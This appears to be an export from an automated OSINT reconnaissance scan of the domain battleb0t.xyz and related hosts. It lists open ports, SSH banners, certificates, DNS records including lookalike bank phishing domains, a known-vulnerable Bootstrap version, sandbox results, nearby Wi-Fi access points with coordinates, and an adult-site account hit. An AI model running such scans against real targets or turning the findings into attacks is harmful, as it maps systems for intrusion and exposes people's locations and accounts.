| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 1 | 2 | 0 | None | SSH-2.0-OpenSSH_7.4 | 87.248.157.102 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | happy (Net ID: 00:02:2D:07:AC:B9) | 34.0544, -118.244 |
| 2023-05-12 02:45:14 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | Toronto, Ontario, ON, Canada, CA | 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:09:35 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 217.30.196.104.bc.googleusercontent.com | 104.196.30.217 |
| 2023-05-12 02:54:48 | Raw Data from RIRs | No | Censys | 0 | 0 | 3 | 0 | None | [raw Censys host record JSON omitted] | 34.148.97.127 |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 104.21.71.14 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | internal (Net ID: 00:0C:41:12:D6:E5) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:EE:D7:F2) | 41.8781, -87.6298 |
| 2023-05-12 03:00:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-64@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", 
"mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], 
"server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", 
"vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | REL (Net ID: 00:02:2D:02:35:63) | 37.780462,-122.390564 |
| 2023-05-12 03:09:45 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 131.97.148.34.bc.googleusercontent.com | 34.148.97.131 |
| 2023-05-12 03:41:55 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 4 | 0 | None | mail.inflany.com | 45.131.109.47 |
| 2023-05-12 03:03:15 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:d8:ac:1a:31:df:8f:f8:c7:c3:27:35:9c:31:39:5f:60:e8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 17:26:22 2022 GMT
Not After : Feb 15 17:26:21 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D4:B4:B6:D6:64:7B:5F:1F:0F:AA:DA:BE:7B:F2:3E:AB:24:EE:4D:D7
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:33:52 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | IDATx
USxLf1 | https://funny.battleb0t.xyz/images/nwp.PNG |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/nomnom.jpg | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:44:16 | Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | oldfluid.battleb0t.xyz | [{u'pubkey_sha256': u'b1d8ad495b85281ccdd8ee8835d1b0223d8372b54869daf463e92de6ed172160', u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z', u'cert': {u'data': u'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', u'sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'type': u'cert'}, u'dns_names': [u'nuke.battleb0t.xyz'], u'tbs_sha256': u'2c51d3eac2fd15713d1b21dd3bb3fdf96ca51847d8b13529deb5504b935d64ba', u'id': u'4818192950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'2307411ab1a35cbd27d910826dd73a859c805fd0ba153a66badcd9b93076677b', u'cert_sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z', u'cert': {u'data': u'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', u'sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'type': u'cert'}, u'dns_names': [u'fluid.battleb0t.xyz'], u'tbs_sha256': u'8146e2bbb69c6bf3a769558c8c5ae10b8e6243d42611ba7db2c4f0b16bf71146', u'id': u'4865007011', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'5a0559923d0fdaac1fc6a74472ffcb94c92e25a29d8d9a48166bcad2947f18e1', u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z', u'cert': {u'data': u'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', 
u'sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'type': u'cert'}, u'dns_names': [u'oldfluid.battleb0t.xyz'], u'tbs_sha256': u'11231ecf169618aac453b5e600bca74016c90998389238bc78e25a336ea53b60', u'id': u'4865013513', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'b65f3ba1cf72aeba89e3a802dee04c06a05e779c0cfeacdd6cb8cefb55c4e2da', u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z', u'cert': {u'data': u'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', u'sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'type': u'cert'}, u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'tbs_sha256': u'5d9c34221e2de124f32114bf34c005fc414285d1b7cc7cab0bb0bd4e745c7797', u'id': u'4869370950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afa |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.206): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.63): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | admire_me (Category: XXXPORNXXX)
https://admireme.vip/login/ | login |
| 2023-05-12 02:46:19 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://zip.co/us/quadpay-terms-of-service', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 18, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://cytoscape.org/download.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:7904:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7904:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "InternetShortcutMutex"\n "Local\\SM0:7980:304:WilStaging_02"\n "SM0:7980:120:WilError_01"\n "Local\\SM0:7980:120:WilError_01"\n "SM0:7904:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "Local\\SM0:7904:304:WilStaging_02"\n "SM0:7904:304:WilStaging_02"\n "Local\\SM0:7904:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7904:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7904:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:49724"\n "184.30.148.171:49727"\n "69.16.175.42:49728"\n "104.18.11.207:49729"\n "142.251.214.130:49731"\n 
"192.229.210.155:49732"\n "18.155.181.7:49735"\n "172.217.164.104:49736"\n "142.250.189.238:49738"\n "108.138.246.126:49741"\n "142.251.32.34:49742"\n "18.155.202.90:49744"\n "142.250.191.78:49747"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cytoscape.org"\n "netdna.bootstrapcdn.com"\n "www.paypalobjects.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"www.paypalobjects.com" (Indicator: "paypal")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00007904]\n "Tabs_13324449104417521" has type "data"- [targetUID: N/A]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- [targetUID: N/A]\n "f_00023e" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00007904]\n "31ec86e4-313c-4ec0-bdbb-d83d42302c58.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- 
[targetUID: N/A]\n "f_000243" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000243]- [targetUID: 00000000-00006444]\n "f_00023d" has type "Web Open Font Format TrueType length 23320 version 1.0"- [targetUID: N/A]\n "manifest.json" has type "JSON data"- Location: [%TEMP%\\7904_1910241172\\manifest.json]- [targetUID: 00000000-00007904]\n "60f652af-af71-4e18-8f97-f706eb4108c1.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\60f652af-af71-4e18-8f97-f706eb4108c1.tmp]- [targetUID: 00000000-00006444]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\manifest.fingerprint]- [targetUID: 00000000-00007904]\n "manifest.json" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- Location: [%TEMP%\\7904_1910241172\\manifest.json]- [targetUID: 00000000-00007904]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007904]\n "445bab36-3288-43e7-bd99-0a1f57dab7f9.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\445bab36-3288-43e7-bd99-0a1f57dab7f9.tmp]- [targetUID: 00000000-00007904]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007904]\n "5b5217f9-d4db-409c-ba93-ec543a9e387e.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\5b5217f9-d4db-409c-ba93-ec543a9e387e.tmp]- [targetUID: 00000000-00007904]\n "62937efd7e73cf26_0" has type "data"- [targetUID: N/A]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code 
Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00007904]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7904_406352213\\edge_driver.js]- [targetUID: 00000000-00007904]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\7904_2089643085\\_metadata\\verified_contents.json]- [targetUID: 00000000-00007904]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://cytoscape.org/download.html"\n Pattern match: "Math.PI/180"\n Heuristic match: "cytoscape.org"\n Pattern match: "https://cytoscape.org"\n Heuristic match: "netdna.bootstrapcdn.com"\n Pattern match: "www.paypalobjects.com"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applied_policy:block,domain:mozilla.github.io},{applied_policy:block,domain:html5test.com},{applied_policy:block,domain:necromanthus.com},{app"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoint.officeapps.live.com/*,https://*word-edit.officeapps.live.com/*,https://*excel.partner.officewebapps.cn/*,https://*onenote.partner.officewebapps.cn/*,"\n Pattern 
match: "cytoscape.org/download.html"\n Heuristic match: "ytoscape.org"\n Heuristic match: "boxguest.sy"\n Heuristic match: "PATHEXT=.COM;.EXE;.BAT;.CM"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/91 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7904_406352213\\edge_driver.js]- [targetUID: 00000000-00007904]\n "edge_tracking_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7904_406352213\\edge_tracking_page_validator.js]- [targetUID: 00000000-00007904]\n "shoppingfre.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7904_406352213\\shoppingfre.js]- [targetUID: 00000000-00007904]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\7904_1134394539\\adblock_snippet.js]- [targetUID: 00000000-00007904]\n "shopping_iframe_driver.js" has type "Unknown"- Location: [%TEMP%\\7904_406352213\\shopping_iframe_driver.js]- [targetUID: 00000000-00007904]\n "edge_confirmation_page_validator.js" has type "Unknown"- Location: 
[%TEMP%\\7904_406352213\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00007904]\n "auto_open_controller.js" has type "Unknown"- Location: [%TEMP%\\7904_406352213\\auto_open_controller.js]- [targetUID: 00000000-00007904]\n "shopping.js" has type "Unknown"- Location: [%TEMP%\\7904_406352213\\shopping.js]- [targetUID: 00000000-00007904]\n "product_page.js" has type "Unknown"- Location: [%TEMP%\ | 185.199.111.153 |
| 2023-05-12 02:47:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 185.199.111.153:443 | 185.199.111.153 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | fse2 (Net ID: 00:01:38:A0:A1:09) | 37.7813933,-122.3918002 |
| 2023-05-12 03:09:18 | Vulnerability - General | Yes | Tool - Retire.js | 0 | 0 | 4 | 0 | None | CVE-2016-10735
Score: Unknown
Description: Unknown | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | do not seek the treasure (Net ID: 00:01:24:F1:72:12) | 34.0544, -118.244 |
| 2023-05-12 02:46:03 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | North Charleston, South Carolina, 29415, United States, North America | 34.148.97.127 |
| 2023-05-12 02:46:50 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 34.74.170.74 |
| 2023-05-12 03:32:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.17:80 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | drapnet (Net ID: 00:09:5B:52:69:9E) | 39.0469, -77.4903 |
